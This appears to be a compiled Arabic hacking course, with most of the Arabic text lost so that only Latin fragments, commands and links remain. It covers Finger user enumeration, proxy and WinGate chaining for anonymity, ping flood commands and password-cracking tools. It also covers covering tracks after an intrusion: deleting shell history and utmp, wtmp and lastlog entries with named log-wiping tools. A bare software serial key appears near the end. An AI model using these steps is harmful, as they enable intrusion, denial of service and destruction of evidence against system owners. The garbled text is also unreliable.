Professional Documents
Culture Documents
1
.2
.3
.4
.5
.6
.7
.8
.9
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.1
.2
.3
.4
.5
.6
.7
.8
.9
.10
.11
.20
.21
.22
.23
.24
.25
.26
.27
.28
.29
.30
.31
.32
.33
.34
.35
.36
.37
.
.
.
.
) (.
) (.
.
.
.
.
Webcrack.
MungaBunga.
.WinSmurf
Evil Ping .
.
.
.
.DNS
.Routing in the Internet
.NETBIOS
.Finger
Net .
secure shell.
Buffer Overflows.
CGI .
!.
) (.
) (.
HTTP Port !!.
NeoTrace.
.
.
) (.
) (.
.
.IIS
UniCode.
.
.
.
God Will .
.NOOP4
.
.
.
.
.
)>&<( .
.38
.39
.40
.41
.42
.43
.44
.45
.46
.47
.48
.49
.50
.51
.52
.53
.54
.55
.56
.57
.58
.59
.60
.61
.62
.63
.64
.65
.66
.67
.68
.69
.70
.71
.72
.73
.74
.75
.76
.77
CgiScaner .
.
Shadow Scan Security .
.
) (.
) (.
) (.
)(.
.htaccess
FTP.
FTP.
.SQL
SQL.
.
.
.
.
) PHP Shell (.
) PHP Shell (.
) PHP Shell (.
.anmap
.
.Cross Site Scripting
.
.
.
.
.
.
.
.Chunked
.
.vBulletin2,2,0
.
.vBulletin 2,2,9
.phpbb 2.0.0
. php nuke
.
.
.
...
.
:
.
"
"
" "
.
)) ((
...................................................................
...
..........................
.. ..
!!!
((
..
.. ..
.
" "
> <
> : <
256 ISDN
. - - (:
:
5
)) )) -
)) ))
.....
- - -
)) ))
)) ((
CSS XSS Cross Site Scripte
XSS
XSS
) ( +
:
XSS+BUG+EXPLOIT
: IIS
IIS+exploit+bug
:
:
: http://www.google.com/
: http://www.yahoo.com/ - http://www.altavista.com/
- http://www.lycos.com/ - http://hotbot.lycos.com/
)) : )) kazaa WinMX
: http://news.bbc.co.uk/hi/arabic/news http://arabic.cnn.com/ - http://www.aljazeera.net/
: http://www.securiteam.com/ http://www.securityfocus.com/ - http://www.ussrback.com/ http://www.ntbugtraq.com/ - http://www.ntsecurity.nu/ http://www.ntsecurity.com/
: http://nvidia.com/ - http://www.asus.com/ - http://drivers.online.net.nz/ - http://intel.com/ - http://www.amdmb.com/
") ) "
> <
> : <
.
. "" .
.
. ..
.
:
.
IP
.
.
.IP
.
.
Start run .winipcfg
"" "" .winipcfg
IP
IP 212.33.40.1 24.5.66.3
IP 212
IP " "
IP IP
.
(IANA(Internet Assigned Numbers Authority IP
:
-1 (ARIN (American Registry for Internet Numbers
-2 (RIPE (Rseaux IP Europens
-3 (APNIC (Asia Pasific Network Information Center
IP .
8
IP whois IP
IP IP
http://www.ripe.net/db/whois.html
IP .
IP
IP 10.10.10.1
0 ) 255 (
IP
IP
. IP 212.26.75.34 IP
212.26.75.201 .
IP ) IP (
IP whois .
http://www.ripe.net/db/whois.html
212.26.75 search
.
Port
.
web server ftp server.
80 21
1720 .
.
DNS
.
.DNS IP ..
CNN 207.145.53.10 www.cnn.com
..
DNS IP
DNS ) IP
( www.cnn.com
DNS
... DNS
IP .
netstat
IP .
. .
.connection
Client .server
)
( ) (port )
( netstat ms-dos prompt
programs
.
)IRC) Internet Relay Chat
chat server chat client
.
.
IP
IRC chat
server
IP
) ( XXX.111.222.333
IP
.
IP
,
:
.1
10
)
( IP .
.2 :
IP
.
)
( IP .
.
)
(
/www.networksolutions.com/cgi-bin/whois/whois
) www ( wagait.com
.
.
25
31337
1720,1503
FTP 21
SMTP
11
BackOrifice
Netmeeting
80
110
139
Chat
6667
12345,20034 NetBus
Web
POP3
12
" ) ("
.
.
.
)(
.
.
-1 ):(Viruses
.
) (
.
-2 ):(Trojans
) ( .
.
" " NetBus"
" Back Orifice " " . SubSeven
) (client
.
) (
) (CD-ROM
.
13
-3 :
.
. "
"
) (
.
"" )
(
.
!! !!
!!
14
-4 :
) ( encrypted .
) ( PWL
.
98 95
.
-5
!
.
! ICQ
.
.
.
IP
!
-6 -6 :
.
.
15
. ) (script
! 4
.
-7 :
FTP )
(SMTP
.
.
.
.
.
" "
16
> <
><JawaDal :
>:
<z3r0
here we G0
.. dos .shell account
. it reboots . ! . !!!
/FTP ftp://hostname:
GFI LANguard network security scanner
..21 .. ..
!!
log in ftp ...cd lcd dir ls :
log in LOGS...(LOG.FILES) 1
LOG
log files ) (loged in
:
online
IP Address >>>>>>>
) host name (
screen resolution
)>>>>(ISP
3 log files:
- WTMP \ \ host tty
- UTMP Onlne
- LASLOG \
!! ) (log.files )track you
... (down
: !
<-- <----FTP-- !
. !
..
<-- <-- <--...--so on--
!! ..
-: Wingate ..
17
Wingate .. Wingate
IP !!
1.. !
....
!! .. anonymous ..web
!!...... .spyware firewall . zone alarm
) .. (
!! windows washer
,. .. .
. how to Stay anonymous on the web how to
secure to secure my computer
.. ..
Preety Good Privacy (PGP)d ..
!
/http://www.pgpi.org :
ok !
.. ..
-1 wingate
!
tracks
: log modifier
ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c
zap.c
==================================================
==========================================
. anonymous
. ..
!!!. .
" "
18
> <
>:<
.
.
.
------------------------------------------------------- -1 .
-2 .
-3 .
-4 .ACL
-5 .
:
-1.
-3.
-3 .
-4.
.
.
:
-1 .
-2 .
-3 .
-4 National
.(Security Agency (NSA
-5
ROM Boot Chip
RAM .
-6 .
-7 Permissions
.
-8 Rights .
19
:
-1 .
-2 .
.
. .
.
Security
(Accounts Manager (SAM Workstation
Domain
SAM
20
Access Token
:
-1 (Security Identifier (SID .
-2 Group SIDs .
-3 Privileges .
Access Token
.Remote Logon
.
:
-1 .
-2 .
-3 .
-4 .No Access
.
(Access Control List (ACL
ACL .(Access Control Entry (ACE
ACE SID
ACE ACL ACE
SID .
: ACE
-1 .AccessAllowed
-2 AccessDenied .No Access
SID SIDs ACE
ACL.
NT 2000 ACE AccessDenied ACEs
AccessAllowed ACEs SID AccessDenied ACEs
AccessAllowed ACEs
SID .
:
21
:
.
:
-1 .
-2 .
" "
22
><
><BeReal :
. .
===========================================================
==========
) -:(Telnet .
.
.
) (21
Anonymous Mode .
Start ==> Run ==> telnet .
------------------------------------------------------------------------
-:Scanner
) (Exploits
.
Shadow Security Scanner Stealth Omran Fast
Scanner .
IIS
CGI .
23
-----------------------------------------------------------------------
) -:(Exploits .
URL
. Buffer Over Flow Exploits
CGI Exploits CGI Bugs
Unicodes Exploits Buffer Over Flow Exploits
PHP Exploits DOS Exploits
. Fire Wall
). (c.
. ) (
Borland C++ Compiler .
----------------------------------------------------------------------
-:FireWall
.
) (
.
----------------------------------------------------------------------
24
-:Anonymouse
.
.
----------------------------------------------------------------------
-:Valnerableties
.
Valnerable (:
.
Security Focus .
----------------------------------------------------------------------
: passwd file
. .
--------------------------------------------------------------------- : root
25
.
.
--------------------------------------------------------------------- :Server
24
24 . (:
.
- . . -
---------------------------------------------------------------------- ) : ( Buffer over Flow
- -
.
- DOS -
.
" "
:::
26
.
.
.
27
> :<
....
...
28
29
http://www.dunbell.freeserve.co.uk/webcrack40.zip
30
><
>< KING HAKER :
:
MUNGA BUNGA
:
-1
-2
-3
-4
-5 ) (
-6
:
1
2 BROWSE
3 BROWSE )
.....(
4
31
5 ) (
6
7
8
9
10
11 6
12
13 ) (
14
:
http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm
32
> :<
..
winsmurf
Scree Shot
--------------------------------------------------------------
33
. 200
.
" "
> <
34
, , :
35
, :
36
:
:
..
http://www.geocities.com/boom_q8y4/dorrah.zip
" "
> : <
37
...
::
"" ===<== :
Ping www.xx.com
:Xxx
.
:
) ( ) ( ) I-( ping -n
:
ping -n 1000 -l 400 www.xxx.com
::
...
:
ping -t ip
ip .
" "
> <
38
2000
63
Telnet Authentication
You can use your local Windows 2000 user name and password or
domain account information to access the Telnet server. The security
scheme is integrated into Windows 2000 security. If you do not use the
NT LAN Manager (NTLM) authentication option, the user name and
password are sent to the Telnet server as plain text.s 2000 security
context for authentication and the user is not prompted for a user
If you are using NTLM authentication, the client uses the Windowname
.and password. The user name and password are encrypted
NTLM
If the User Must Change Password At Next Logon option is set for a
user, the user cannot log on to the Telnet service when NTLM
authentication is used. The user must log on to the server directly and
.change the password, and then log on through the Telnet client
NTLM
In a Windows 2000 Server default installation, the Telnet service is set to
manual startup. You can use the Services snap-in or the Computer
Management snap-in to start, stop, or configure the Telnet service for
2000 .automatic startup
Services
39
In the Computer Management snap-in, Telnet is a service located under
the Services and Applications node. Select Services from the console
.tree, and then select Telnet from the list of services in the details pane
You can also start or stop the Telnet service from a command prompt.
To start Telnet Server, type net start tlntsvr or net start telnet at the
command prompt, and then press Enter. To stop Telnet Server, type net
stop tlntsvr or net stop telnet at the command prompt, and then press
.Enter
Telnet Server Admin
You can use the Telnet Server Admin utility to start, stop, or get
information about Telnet Server. You can also use it to get a list of
current users, terminate a user's session, or change Telnet Server
Telnet Server Admin .registry settings
Telnet Administration Tool , Telnet Server Admin
.OK ,tlntadmn ,Run ,Start Administrative Tools
.(Adminpak.msi) , Telnet Server Admin
Telnet Server Administration
Quit this
application
Terminate a user
session
Display/change
registry settings
40
Invalid input
. telnet .telnet ,Run ,Start ,Telnet
TCP/IP
To display help for Telnet, type help at the Microsoft Telnet command
prompt. To connect to a site, type open <computer_name> where
<computer_name> is the IP address or host name of the computer
.running the Telnet service
41
Hishem1 Hishem2
Hishem2 Hishem1 Hishem2
Hishem1
Hishem1 Administrator
, Start ,Programs Administrative Tools .Services
Services
.Telnet
(The Telnet Properties (Local Computer
Startup Type Manual .Automatic
,Service status . Start
OK )Local Computer) Telnet properties
. Services
Hishem1 Hishem2
, Start .Run
telnet .OK
help ?
open Hishem2
42
o open
Hishem2
Hishem2
Hishme2 Hishem1
, Start .Run
tlntadmn .OK
Telnet Server Admin
1
NOR IP
43
1 1
Hishem1
Start Run Telnet pop.mail.yahoo.com 110
user
user xxxx
pass pass xxxx
Ok
List
44
dele
pop
[open [\\RemoteServer] [Port
\\ RemoteServer
. .
Port
. .
.o
Redmond 44:
o redmond 44
Telnet
[close [\\RemoteServer
45
\\ RemoteServer
. .
.c
Redmond:
c redmond 44
Telnet
[?] [send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch
\\ RemoteServer
. .
ao
.
ayt
"."?Are you there
esc
.
ip
.
synch
.Telnet
Telnet
46
display
tlntadmn
Telnet
[tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue
\\ RemoteServer
. .
start
.Telnet
stop
.Telnet
pause
.Telnet
continue
.Telnet
Telnet tlntadmn
2000 .2000
47
\\ RemoteServer
. .
maxconn=PositiveInteger
. 10
.
Telnet
[tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger
\\ RemoteServer
. .
maxfail=PositiveInteger
.
.100
Telnet
[tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss
\\ RemoteServer
48
. .
timeout=hh:mm:ss
.
? / ..
49
==============
DNS : . Domain Name System DNS
53 DNS
53 translates alphabetical hostnames
/http://www.burn.com : IP ADRESSES 127.0.0.1
address resolution IP
DNS . address resolution DNS
). (IP
address resolution DNS
HOST FILE
IP Stanford Research Institute's
.(Network Information Center (SRI-NIC
) (UPDATE
FTP .SRI-NIC
DNS .
DNS decentralized
DNS DNS
DNS
.
DNS
.
:THE DNS SERVER
================
DNS SERVER UNIX
BIND ) .(Berkeley Internet Name Domain
DNS SERVER . UNIX
DNS :
(the name server itself (the daemon program that listens to port 53
RESOLVER
NAME SERVER
/http://www.burn.com DNS )
( IP /http://www.burn.com
IP
.
daemon program
.
:THE TREE INFORMATION
======================
IP DNS
50
DNS SERVER
.DNS SERVERS
:
ISP isp.co.uk
ISP's DNS server's
hostname dns.isp.co.uk DNS IP
/http://www.burn.com dns.isp.co.uk
DNS
SERVER
dns.isp.co.uk some-organization.org.uk school.edu.uk,
university.ac.uk, england.gov.uk, airforce.mil.uk
UK
DNS ROOT IP
.DOMAIN NAME
?When and why does DNS "hang" or fail
======================================
DNS . ISP IP
.
DNS 15 .
address could not be found
HOST IP
DNS . TIMED OUT
REFRESH RELOAD .
SSL
.
51
52
ip .
ip
.
)inclusion of a
.(local network address or physical address within the frame
local networks .gateways
, routers
. ip routing
.
address translation
/http://www.burn.com ip
) DNS DNS (.
Physical Address :
:Physical Address Determination
===============================
ip data
.
physical address .
ip , physical addresses ip
.
ip physical addresses ARP
Address Resolution Protocol
ip , physical addresses ARP
. cache
arp -a .
:
C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface 0x2
Internet Address Physical Address Type
dynamic 20-53-52-43-00-00 207.46.226.17
dynamic 20-53-52-43-00-00 213.131.64.2
dynamic 20-53-52-43-00-00 213.131.65.238
Physical Address
Physical Address Mac Address
Physical Address
ip Physical Address
router .
type dynamic
.
53
SNMP
NetBIOS
NetBIOS API 139 TCP
NT
NetBIOS TCP/IP
Advanced WINS
54
RestrictAnonymous
Administrative TOOLS Local Security
policy Local poicies security options Additional restrictions
for anonymous connections security No Access
Without Explicit Anonymous Permissions
NetBIOS
Net View
NT/W2000
IP
Net
.
Nbtscan
...
...
Legion
55
regedit
HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent
=
LANManagerMIB2Agent
2
TCP/IP NetBIOS
56
" "Finger
> <
><LAMeR :
Finger 79
>================<
1.1
1.2 Finger
1.3 Finger
1.4 Finger
1.5 Finger
1.6
1.7
1.1:
>=========<
.
1.2 Finger
>===================<
Finger 79
businesscard .
) ( remote user Finger
) Finger (79 .
.
57
, ) (admin
.
Finger
. Finger
.
Finger
) ( Finger Deamon " " !Finger me " ! "
Finger
) (bisinesscard
Finger Deamon
) ( .
.
portscans . . .
Finger
.
Finger
: Finger
.
:) ( server
1.3 Finger
>=================<
) ( superscan
) ( /http://www.foobar.com ) Port( 79
/http://www.foobar.com
Finger .
) (request
) (client Finger ) ( installed
Telnet Finger
---Telnet(client) --------request-------> Finger Deamon(in Server) o
): ( MS DOS
telnet http://www.foobar.com/ 79
58
telnet .
)(client Finger
Deamon
.
:::
"@" " "www
:
finger@anyname.com
:
/finger http://www.anyname.com
finger www
) : ( unix shell
finger@foobar.com
) (
/http://www.foobar.com
:
:Login: Name: Tty: Idle: When: Where
root foobar sys console 17d Tue 10:13 node0ls3.foobar.com
<.......> <.......> <.......> Amos Amanda
Anderson Kenneth
Bright Adrian
Doe John
<.......> <.......> <.......> Johnson Peter
Mitnick Kevin
Munson Greg
Orwell Dennis
) ( login )" (Name "
.
)(Tty the terminal type
) (Idle .the idle time
.
..
) Johnson Peter
59
( :
finger johnson@foobar.com
1.4 Finger
> =========================
===========<
.Finger
Finger deamon .
) ( % 50
/ )(Access .
bruteforce
worldist password cracker
/http://www.thehackerschoice.com
VLAD's pwscan.pl
) word (
- bruteforce
-
.
) (Admin ) (root
. .
.
:
finger secret@foobar.com
Finger Deamon
" "secret .
" "test " "temp ""0000
" "secret
.
finger .@foobar.com
finger 0@foobar.com
!
Finger Deamon RFC !
1.5 Finger
> =========================
60
=============<
) Finger Finger "" ""(
""www.victim.com
" "www.host.com Finger
): (
finger@host.com@victim.com
Host.com ) (Finger victim.com .
victim.com
/http://www.victim.com
) (log /http://www.host.com .
) Host( ) ( Finger
Finger
Finger .
:
!.
1.6
>=======================<
Finger Deamon
) ( access .
Finger deamon
.access
wordlist .bruteforce
" " .Finger deamon
61
> <
.net
net :
net ? net /
.
net
net help command .
net accounts :
net help accounts
net ) /y( ) /n( .
net stop server
net stop server /y
.
) .("Service Name " net
:logon
"net start "net logon
62
63
64
65
)*(.
66
67
) .(Sales\Ralphr
68
::
SSh
===============
secure shell )(
remotely connection
)rlogin,rsh and
.(rcp
secure shell tcp .
:: ::
secure shell r- commands
==================================================
======================================
======================
* BSD r- commands )
(rlogin,rsh and rcp
) (root access
unauthorized access to systems
:
(
ssh
. authorized access to systems
secure shell
) (
::
ssh
70
===========================================
-1 ip spoofing
ssh
ssh . localy
-2 DNS spoofing
-3
-4
ssh
ssh disconnected
.
ssh )three-key triple-DES, DES, RC4-128,
(TSS, Blowfish
" encryption of type "none !
ssh ,
ip spoofing DNS spoofing
.
.
71
:
-1 Buffer Overflow
<--------------------------
-2)(Proccess
<-----------------
-3 )(Memory management
<--------------------------------
-4 Buffer Overflow
<----------------------------------
*
-1 Buffer Overflow
<>-----------------------
Buffer Overflow .
Buffer Overflow ' 'code red
IIS - MS web server-
Buffer Overflow ) 20
.
(
:
" : " :
) ( .
15
) ( 25 )
(.
15 " "Overflow
.
:
><var1><var2><vname><Other things in memory
10b 6b 15b
) var 1 var 2 vname, 15
(
" abcabcabcabcabcabcabcabca
"bc :
somevalue2avalusabcabcabc
abcabcabcabcabcabc
><var1 ><var2><vname ><other things go here
" vname "overflowed
72
.
" "Multi- proccesses ...
) (CPU
.. (:
.
:
-3 ):(Memory management
<>------------------------------
-operating systems- )virtual memory(.
) ( .
Operating System "
)(" .
) OS (
.
)(
) (
) (
.
.:
) (
) (
) (
)( .
-4 Buffer Overflow
<>---------------------------------
73
) (Root
)(
) (overflow
.
: )( )
(
)( .
Buffer Overflows Buffer Overflows
.
Buffer Overflow
.
74
) (1 CGI
TCP/IP .
) 80 (
-1
-2
75
GET -1
POST -2
PUT -3
) (2
HTTP
. FTP .TELNET
" !"
> <
> :<
:
==========
..
..
..
76
..
.. .. ..
log files
.. ! !!
..
************************
) ( exploites
" "
) ( 0day ..
!!
!!
!!
..
hacker
..
************************
8 :
=================
: ) (
: **" " Paranoid
:
" " Paraniod " " Paranoid !** ..
.
: )
(
LoGs : ) (
lOGs .. syslog configuration and logfile Admins checksum checking software :
:
77
:
: ........ !!! ...
************************
:
=======
:*************
.. ..
) ( Hacker ..
) (
" " Paranoid***************************
" " Paranoia )
(
..
paraniod :
!!
.. ..
..
!!
.. .. ... .. ..
) (
.. !!
!
.. )
( .. .. ..
!!
..
log
hacker .. % 100
" " Paranoid*********************
" " Paranoid
...
) (
... ..
..
.. ) (
78
..
!
!******************************************
..
: !!!!
:=========
******
..
:***********
SysAdmin ..
(= hacker
.. ..
) (
>--
<- sensitive data
..
:
MsDos SFS v.17 SecureDrive 1.4b *Amiga * ) EnigmaII v1.5 (
Unix CFS v1.33 ) ( ) ( :
Triple DES IDEA (Blowfish (32 rounds file2file :
79
:
===================
\\\ :
..
telnet security .. !!!! .. ==< >----
: LoGS
============
80
3 :
WTMP ) ( log on/off - log in/logout + tty + host UTMP ! LASTLOG logins** ) (
telnet , ftp , rlogin ..
:
!! .. % 99.9 ) .. (
logfiles
.. ..
..
:
ZAP (or ZAP2
..
root ) log files (
) default (
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
$home/.lastlog
:
=======
.. !!!
tmp and $HOME/
Shell History $HOME :
: History files
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
: Backup Files
~* ,dead.letter, *.bak
: History files
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
81
======================
encrypted partition
) (
admin
..
..
.. shells
background !!!
parametres ...
telnet http://www.host.com/ 23 :
telnet
open
/http://www.host.com
..
backdoors )
sub7 (
:
===============================
*******
sniffer ..
:
**********************
) ( hacker ...
!!!
...
* ) ( ) ( admin
) (
output sniffer
netstat online
!! GateWay Server
* A gateway server in between
wtmp and lastlogs
gateway server
..
.. gateway server
..
==< ) root access (
Dialup server ..
(= hacked system
: dialup hacking
82
server
) ( )
( dialup servers !
:
lOGs ..**************************************************
***
..
:
- 1 : LSOF List Open
Files
- 2 ) ( -
touch /tmp/check ""find / -newer /tmp/check -print
: <- <- <-
log files /usr/adm /var/adm /var/log
loghost xx@loghost ..
loghost
logfiles text editor
wc 10 "head -LineNumbersMinus10" :
) 10( head -
accouting acct-cleaner from
zhart
wtmpx utmpx !!!
.. ) ( =(
syslog configuration and logfile************************************
syslog function ..
syslog
logs hosts ...
hosts
syslog /etc/syslog.conf
83
******************************
.
cron /var/spool/cron/crontabs
. Root .
"."crontab -l root
. ~/bin
. sinnefer .
,tiger, cops, spi, tripwire, l5
.binaudit, hobgoblin, s3 etc
,
, :
) (
back door Admins****************************
, .
:
forword. alias sulog su root group ) admin, root,wheel, etc
passwd , . ) ,
chid.c, changeid.c ( .
history/.sh_history/.bash_history ,
, . .
profile/.login/.bash_profile alias ,
. ,
checksum checking software
************************
) checksum .
(
checksum
84
:
=========
***************************
) ( administrators
) (
: administrators hacker ==< ...
) admins hacker
administrator administrator (
..
..
..
..
) ( ..
..
..
85
:
=========
:
**************************************************
**************
: !!!! : ..
..
) (
..
: !!! :
.. ..
) (
..
!
:
========
:
******************************
Change - Changes fields of the logfile to anything you want
Delete - Deletes, cuts out the entries you want
Edit - real Editor for the logfile
.Overwrite - just Overwrites the entries with zero-value bytes
!Don't use such software (f.e. zap) - it can be detected
--------------------------------------------------------------LOG MODIFIER
++++++++++
ah-1_0b.tar Changes the entries of accounting information
clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx
cloak2.c Changes the entries in utmp, wtmp and lastlog
invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so
! it's better than zap. Watch out, there are numerous inv*.c
!marryv11.c Edit utmp, wtmp, lastlog and accounting data - best
wzap.c Deletes entries in wtmp
wtmped.c Deletes entries in wtmp
!zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected
------------------------------------------------------------------------------------- :
=========
**********
86
.. .. !!
) (
..
" ) ( "
> <
> :<
87
++++++++++++++++++++++++++++++++++
Introduction to Proxy Server
=) proxy server: (=
) proxy server ( server
proxy server
LAN:
Local Area Network
proxy server
proxy server
/http://hackergurus.tk
proxy server proxy server
/http://hackergurus.tk
server
:...
bit )(
proxey server
lucky
!
proxy server
download #..
10
proxy server
Refresh Reload
Why use a Proxy Server
=) (=
!!!
:
ISP
Internet Service Provider
Traffic
proxy server
ip
ip
proxy port proxy server
88
!! (..
cach.microsoft.com 80
-1
-2
-3
Logs
Introduction to Wingate
=) =(Wingate
WinGate
proxy server firewall
) Anonymously (
WinGate :
------------------------------------------------------------------------------------------dial up modem, ISDN, xDSL, cable modem, satellite connection, or even
dedicated T1 circuits
------------------------------------------------------------------------------------------wingate
, 23
. Telnet
the wingate .
wingate ) Aminstrator(
wingate ,
) Local Network (
ipspoof ICQ - Mirc .
wingate open wingates
) Admin( DIScover
!!!
WinGate
WinGate SyGate
) Logs( WinGate Server 48
) ISP's (
wingate
How do I find Wingates
=) WinGate(=
. wingate
.
WinGate Scanner
google
/http://www.google.com
89
ip hostname
@home
:
wingates wingate NetWork
...
Unix :
Trial and Error
wingate 23
) Guest( Anonymously
Introduction to Socks Host
=) =(Socks Host
Socks Host WinGate 1080
explorer and netscape
Socks Host
Mirc ip FireWall
**********************
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
------------------------------------------- %100
" ) ( "
> <
> :<
...
Chaining Proxies
90
/http://www.proxytester.com
Ip !!!
..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
Proxy (WebSite,IRC Chat,etc):
Proxy Server
...
][User]>>>>>[Proxy]>>>>>[Web Pages
---------------Proxy Chaining
91
---------------
/
][User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination
Destination = web page, Unix server, ftp server, etc
Proxy chaining
server telnet, ftp, or http
Chaining %100
ftp
Adminstrator Logs proxy
Chaining Proxy
Logs
Logs ...
---------------HTTP Chaining
--------------- HTTP chaining Proxy Address
:
http://proxy.magusnet.com/-_-http://www.google.com
) (-_- !!!
Chaining:
_http://proxy.server1.com/-_-http://proxy.server2.com/-http://www.destination.com
http://anon.free.anonymizer.com/http://www.google.com
) (/
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
= proxy .....
---------------Browser Chaining
--------------- Internet Explorer
----
213.234.124.23:80
213.234.124.23:
92
80:
ISP
Tools
Internet Options
Connections
Settings
) Address(
) Port(
213.234.124.23: 80:
Chaining Proixes
/
Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate proxy server
)) 23 Telnet ((
Wingates online
Admin
wingate !!!!
ip 23 Telnet
WinScan
Wingate
93
Download
------------------------------Chaining Wingates Using Telnet
------------------------------ Wingate
DoS Telnet .....
wingate 23
Telnet
61.133.119.130 23
Telnet:
C:\WINDOWS>telnet 61.133.119.130 23
Wingate> 203.207.173.166 23
Wingate> 213.17.99.45 23
Wingate> 10.65.212.7 23
94
wingate
WinGate>arbornet.org
C:\Windows> telnet 61.133.119.130 23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected
95
" "Logs
> <
> : <
.
. Unix Multi-User Mode .
. Operation ) ( Linux ) . ( Unix
Unix
:
.
....
: ( LOG File ) ...
: ... ....
IP
........
Microsoft
Windows Linux Mac
....
96
..
: ...
) . ( LOG File .
) (Web servers
) (log files .
.
) (log file
.
.
- -
:
...
...
97
. WIN NT
...
:
) ( ) (
...
... ..
...
. :
lastlogin.
.
.
bash_history.
contactemail.
Tmp trash. . etc
.
lastlogin & .bash_history.
rm bash_history.
:
rm .bash_history
rm .bash_history
lastlogin. .
....
cpanel .
..
localhost :
...
:
....
98
...
...
...
...
: ... ....
..
.. ) ( HTTP Protocol
HTTP .... . SOCKS Protocol
.
.
Web Proxy Service (1 . HTTP Protocol .
WinSock Proxy Service (2 windows NT
telnet FTP WinSock
...... Protocol
. Socks Proxy Service (3 )SSL) Secure Sockets
Layers ) IIS) Internet Information Server Windows NT
FTP Telnet GopherIRC RealAudio POP3
firewall ... securiy .
..... TCP/IP
:
* )(Internationa Organization for Standardization
** . ransmission Control .
... Protocol TC
... :
Ping Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP
... WIN NT : TCP/IP
...
UNIX Router .
... .
) . ( Router : .
.
99
.... ... .
. ...
... . :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
Port 111 = SunRPC
Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail
.
: ... HTTPort .
.
TCP/IP HTTPort
( ) Proxy Server
ISP
) ) Proxy .
HTTPort
.
SOCKS
...
100
101
102
103
104
...
( Anonymous)
: ... 18
AnalogX Proxy
HTTP (web), HTTPS (secure web), POP3 (recieve mail), :
SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and
Socks4/4a and partial Socks5 (no UDP) protocols! It works great with
Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft
!Messenger, and many more
http://www.analogx.com/files/proxyi.exe
PortBlocker :
:
PortBlocker is configured to block the most common types of servers
that might be on a system (FTP, HTTP, etc), so will not require any
modification for most users. If you are running a special server of some
sort, then you can easily add it's ports (either TCP or UDP) to it's list,
.and have them blocked and/or logged
Log unauthorized port access attempts and secure internal servers from
...internet access easily
105
PortBlocker
http://www.analogx.com/files/pblocki.exe
.
...
...
...
Proxy Log Analyzer :
:
MB 1.07 :
http://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive instructions 818 kb
http://www.mechanicalminds.com/software/pla/pla.zip
.
Provides a space for you to type the address and port number of the
proxy server you want to use to gain access to the Internet over HTTP,
.Secure, FTP, Gopher, and Socks protocols
106
.
... .
107
108
Port mapping
Add
New mapping
109
Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN
Proxy
,,,
110
Start
127.0.0.1
80
..
111
112
113
:
XDQG-2ZKN-X2PA-KTRQ
114
" "
> <
> :<
:
=) (=
^^^^^^^^^^^^^^^^^^^
/http://www.netcraft.com
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
/http://www.almodammer.com
dfl;kjgk'dgjbumpipt@almodammer.com
Headers
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners
..
Telnet Client
FTP 21
TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
Hyper Text Transfer Protocol
8080 - 80
80 Telnet
GET /qwe HTTP/1.1
400
:
HEAD 127.0.0.1 HTTP/1.1
...
^^^^^^^^^^^^^^^^^^^
115
=) (=
^^^^^^^^^^^^^^^^^^^
ping ip
!
ping ipsite
=ipsite
TTL=XXX
=XXX
:
Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255
: ) data list or packet ( Nodes TTL 1
tracert traceroute
tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Windows
:
) N-Stealth ...(
=============
( Shadow Sceurity Scanner
116
(
=============
( SuperScan
( List
------------------------------------------------------------------------Linux
Nmap
( ) Network Maper
Linux
//
:
/ nmap
[l] Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
(Some Common Scan Types ('*' options require root privileges
